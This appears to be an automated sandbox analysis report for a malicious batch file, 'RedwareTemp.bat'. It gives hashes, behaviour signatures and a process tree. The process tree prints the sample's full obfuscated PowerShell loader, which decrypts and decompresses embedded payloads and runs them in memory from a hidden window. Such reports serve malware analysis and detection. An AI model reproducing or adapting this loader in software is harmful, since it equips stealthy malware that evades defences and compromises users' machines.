Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/03/2025, 00:11
Static task
static1
Behavioral task
behavioral1
Sample
RedwareTemp.bat
Resource
win7-20240903-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
RedwareTemp.bat
Resource
win10v2004-20250217-en
23 signatures
150 seconds
General
-
Target
RedwareTemp.bat
-
Size
548KB
-
MD5
73c36e7e75e989f8b1e5dd4e9a1b493d
-
SHA1
af5bf582a6d1b424355f8af579b8f202fbe4b834
-
SHA256
2b0fa86f46148d25d365085a021a9b836e34275955ca0446723553bbcf388ac0
-
SHA512
5c95fcfb41ca505ca2a9d7d0f11d4e57831bfabd5e1c741c6bf26b0b2a89e36524cca53e6eff3ad7ccac14c0030ab0fc76581275ee8acfe0304be216a6e6ec44
-
SSDEEP
12288:FTiR+PqY3LWerg7f9AqvSU84kI3Hu+MoovimheIBVXMTT:RhAfcidQ6mEy8P
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2776 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2260 wrote to memory of 2772 2260 cmd.exe 32 PID 2260 wrote to memory of 2772 2260 cmd.exe 32 PID 2260 wrote to memory of 2772 2260 cmd.exe 32 PID 2260 wrote to memory of 2776 2260 cmd.exe 33 PID 2260 wrote to memory of 2776 2260 cmd.exe 33 PID 2260 wrote to memory of 2776 2260 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\RedwareTemp.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('olj6lNDH9BP9+WoXhpaGp14B/+RuhRlVS9vcmbQmtAw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5d9Zu+yF4iwq9mJwhaRdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPZnK=New-Object System.IO.MemoryStream(,$param_var); $OVsRl=New-Object System.IO.MemoryStream; $Lntcu=New-Object System.IO.Compression.GZipStream($dPZnK, [IO.Compression.CompressionMode]::Decompress); $Lntcu.CopyTo($OVsRl); $Lntcu.Dispose(); $dPZnK.Dispose(); $OVsRl.Dispose(); $OVsRl.ToArray();}function execute_function($param_var,$param2_var){ $rQsSK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fhwRv=$rQsSK.EntryPoint; $fhwRv.Invoke($null, $param2_var);}$qkzrl = 'C:\Users\Admin\AppData\Local\Temp\RedwareTemp.bat';$host.UI.RawUI.WindowTitle = $qkzrl;$KRqly=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qkzrl).Split([Environment]::NewLine);foreach ($NNMBM in $KRqly) { if ($NNMBM.StartsWith('AyaGWreXdjmRZwIZSJRC')) { $nXbFi=$NNMBM.Substring(20); break; }}$payloads_var=[string[]]$nXbFi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
-